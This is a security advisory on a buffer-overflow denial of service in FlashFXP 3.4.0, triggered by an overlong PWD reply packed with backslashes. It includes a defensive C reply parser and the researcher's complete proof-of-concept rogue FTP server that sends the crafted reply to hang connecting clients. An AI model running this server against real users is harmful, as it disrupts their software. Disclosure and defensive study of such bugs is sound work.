Security Research

Security Vulnerability
FlashFXP PWD Command Overlong Malformed Argument Remote Buffer Overflow Vulnerability

Release date: 2007-02-06
Updated: 2007-02-07

Affected systems:
FlashFXP 3.4.0 build 1145
Description:
BUGTRAQ ID: 22433

FlashFXP is a popular FTP client.

FlashFXP contains a buffer overflow vulnerability in its handling of malformed command requests; a remote attacker could exploit it to render the client unresponsive.

If a PWD command sent to FlashFXP contains more than 5420 "\" characters, each separated by at least one different character, the application becomes unstable. FlashFXP first hangs for 45 seconds while consuming 100% of available resources; if the user then disconnects and reconnects to the server, FlashFXP enters an infinite loop writing data onto the stack.

<*Source: Marsu (Marsupilamipowa@hotmail.fr) *>
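The trigger described above is a 257 reply whose quoted path is far longer, and contains far more separators, than any legitimate directory name. The defensive counterpart is to bound the reply before any path handling runs. The following is an added example, not part of this advisory and not FlashFXP's code: a small parser for RFC 959 style `257 "<path>"` replies that rejects a reply that is not 257, is unterminated, exceeds an assumed path length limit, or exceeds an assumed separator limit. The limits `MAX_PATH_LEN` and `MAX_SEPARATORS`, the function names, and the constructed reply built by `check_constructed_reply` are all assumptions for illustration.

```c
/* Added example (not FlashFXP's code): a bounded parser for FTP 257 (PWD)
 * replies that rejects the malformed responses described in this advisory
 * before they reach path-handling code. Assumes the RFC 959 reply shape
 *   257 "<path>" <optional text>\r\n
 * where a literal double quote inside the path is written as "". The limits
 * below are assumed policy values, not anything FlashFXP uses. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MAX_PATH_LEN   4096   /* longest path accepted (assumed policy) */
#define MAX_SEPARATORS 1024   /* most '\\' or '/' accepted in one path (assumed policy) */

enum pwd_verdict {
    PWD_OK = 0,
    PWD_NOT_257,        /* line does not start with 257 " */
    PWD_UNTERMINATED,   /* end of line reached before the closing quote */
    PWD_TOO_LONG,       /* path longer than MAX_PATH_LEN */
    PWD_TOO_MANY_SEPS   /* more than MAX_SEPARATORS separators */
};

/* Parse one reply line. On PWD_OK the unquoted path is in out (truncated to
 * fit outsz, always NUL-terminated when outsz > 0). On any other verdict the
 * contents of out are not meaningful. Pass out=NULL, outsz=0 to only check. */
enum pwd_verdict parse_pwd_reply(const char *line, char *out, size_t outsz)
{
    size_t len = 0, seps = 0;
    const char *p;

    if (outsz > 0)
        out[0] = '\0';
    if (strncmp(line, "257 \"", 5) != 0)
        return PWD_NOT_257;

    for (p = line + 5; *p != '\0' && *p != '\r' && *p != '\n'; p++) {
        if (*p == '"') {
            if (p[1] != '"')            /* unescaped quote closes the path */
                return PWD_OK;
            p++;                        /* "" stands for one literal quote */
        }
        if ((*p == '\\' || *p == '/') && ++seps > MAX_SEPARATORS)
            return PWD_TOO_MANY_SEPS;   /* the advisory's trigger pattern */
        if (len == MAX_PATH_LEN)
            return PWD_TOO_LONG;        /* bounded regardless of separators */
        if (outsz > 0 && len < outsz - 1) {
            out[len] = *p;
            out[len + 1] = '\0';
        }
        len++;
    }
    return PWD_UNTERMINATED;
}

/* Build a constructed reply whose path is `pairs` repetitions of "a\", the
 * shape described in this advisory, and return the parser's verdict for it. */
enum pwd_verdict check_constructed_reply(size_t pairs)
{
    static char buf[32768];
    size_t i, pos;

    if (5 + 2 * pairs + 4 > sizeof buf)  /* keep the sample inside buf */
        pairs = (sizeof buf - 9) / 2;
    memcpy(buf, "257 \"", 5);
    pos = 5;
    for (i = 0; i < pairs; i++) {
        buf[pos++] = 'a';
        buf[pos++] = '\\';
    }
    memcpy(buf + pos, "\"\r\n", 4);     /* copies the terminating NUL too */
    return parse_pwd_reply(buf, NULL, 0);
}

int main(void)
{
    printf("3 pairs    -> verdict %d\n", (int)check_constructed_reply(3));
    printf("6000 pairs -> verdict %d\n", (int)check_constructed_reply(6000));
    return 0;
}
```

A reply of 3 pairs parses as a normal path, while one of 6000 pairs is rejected as soon as the separator count passes `MAX_SEPARATORS`, long before the path limit is reached; a client or proxy can drop the connection at that point instead of handing the path on.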

Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Use at your own risk!

/***************************************************************************
*           FlashFXP V 3.4.0 build 1145 Buffer Overflow DoS                *
*                                                                          *
*                                                                          *
* There's a strange bug in FlashFXP.                                       *
* When sending a long PWD command with more than 5420 \ separated by at    *
* least one different char, it is possible to make the app unstable.       *
* It will first freeze during 45s consuming 100% resources, and then, if   *
* the user hits disconnect and then reconnects to the server it will enter *
* in an infinite loop trying to put data on the stack.                     *
*                                                                          *
*                                                                          *
* I admit it is a little bit tricky but maybe someone will find a better   *
* way to exploit this vuln.                                                *
*                                                                          *
* Have Fun!                                                                *
*                                                                          *
* Coded by Marsu <Marsupilamipowa@hotmail.fr>                              *
***************************************************************************/

#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#pragma comment(lib, "ws2_32.lib")

int main(int argc, char* argv[])
{
    char recvbuff[1024];
    char evilbuff[11000];          /* holds the oversized 257 reply */
    struct sockaddr_in sin;
    SOCKET server, client;
    WSADATA wsaData;
    WSAStartup(MAKEWORD(1,1), &wsaData);

    int n=1;
    while (n<=2)
    {
        server = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
        sin.sin_family = PF_INET;
        sin.sin_addr.s_addr = htonl(INADDR_ANY);
        sin.sin_port = htons( 21 );
        bind(server,(SOCKADDR*)&sin,sizeof(sin));
        printf("[*] Listening on port 21...\n");
        listen(server,5);
        printf("[*] Waiting for client ...\n");
        client=accept(server,NULL,NULL);
        printf("[+] Client connected\n");


        memcpy(evilbuff,"220 Hello there\r\n\0",18);
        memset(recvbuff,'\0',1024);

        if (send(client,evilbuff,strlen(evilbuff),0)==-1)
        {
            printf("[-] Error in send!\n");
            exit(-1);
        }

        //USER
        recv(client,recvbuff,1024,0);
        printf("%s", recvbuff);
        memcpy(evilbuff,"331 \r\n\0",7);
        send(client,evilbuff,strlen(evilbuff),0);
        Sleep(50);

        //PASS
        recv(client,recvbuff,1024,0);
        printf("%s", recvbuff);
        memcpy(evilbuff,"230 \r\n\0",7);
        send(client,evilbuff,strlen(evilbuff),0);

        //SYST
        memset(recvbuff,'\0',1024);
        recv(client,recvbuff,1024,0);
        printf("%s", recvbuff);
        memcpy(evilbuff,"215 WINDOWS\r\n\0",14);
        send(client,evilbuff,strlen(evilbuff),0);

        //FEAT
        recv(client,recvbuff,1024,0);
        printf("%s", recvbuff);
        memcpy(evilbuff,"211 END\r\n\0",10);
        send(client,evilbuff,strlen(evilbuff),0);

        //PWD
        int i=5;
        recv(client,recvbuff,1024,0);
        printf("%s", recvbuff);
        /* fill the reply body with alternating 'a' and '\' so every
           backslash is separated by a different character */
        while (i<10840) {
            memset(evilbuff+i,'a',1);
            i++;
            memset(evilbuff+i,'\\',1);
            i++;
        }
        memcpy(evilbuff,"257 \"",5);
        memcpy(evilbuff+10840,"\"\r\n\0",4);
        send(client,evilbuff,strlen(evilbuff),0);
        closesocket(client);
        closesocket(server);
        client=server=INVALID_SOCKET;

        if (n<2) {
            printf("[+] Now FlashFXP is out for 45sec.\n");
            printf("[+] Note that user MUST click on disconnect and then reconnect\n"
                   "    to trigger the bug.\n\n");
        }
        n++;
    }
    Sleep(2000);
    printf("\n[+] FlashFXP must be DoSed\n");
    return 0;
}

Recommendation:
Vendor patch:

FlashFXP
--------
The vendor has not yet released a patch or upgrade. Users of this software are advised to watch the vendor's homepage for the latest version:

http://www.flashfxp.com/

Severity: 0 (user vote)
This vulnerability was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.